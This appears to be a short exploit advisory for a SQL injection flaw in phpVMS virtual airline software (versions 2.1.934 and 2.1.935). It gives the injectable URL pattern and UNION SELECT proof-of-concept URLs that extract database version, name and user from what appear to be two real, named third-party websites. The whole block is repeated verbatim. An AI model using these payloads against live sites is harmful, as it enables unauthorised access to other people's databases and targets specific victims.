phpVMS Virtual Airline Administration <= SQL Injection Vulnerability
[o] phpVMS Virtual Airline Administration <= SQL Injection Vulnerability
Software : ZAPms
Version : 2.1.934 & 2.1.935
Vendor : http://www.phpvms.net
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
[o] Exploit
http://localhost/[path]/index.php/PopUpNews/popupnewsitem/?itemid=[SQLi]
[o] PoC
http://vupscargo.com/index.php/PopUpNews/popupnewsitem/?itemid=43+union+select+1,version(),database(),4,user()--
http://malaysiava.org/index.php/PopUpNews/popupnewsitem/?itemid=12+union+select+1,version(),database(),4,user()--
Software : ZAPms
Version : 2.1.934 & 2.1.935
Vendor : http://www.phpvms.net
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
[o] Exploit
http://localhost/[path]/index.php/PopUpNews/popupnewsitem/?itemid=[SQLi]
[o] PoC
http://vupscargo.com/index.php/PopUpNews/popupnewsitem/?itemid=43+union+select+1,version(),database(),4,user()--
http://malaysiava.org/index.php/PopUpNews/popupnewsitem/?itemid=12+union+select+1,version(),database(),4,user()--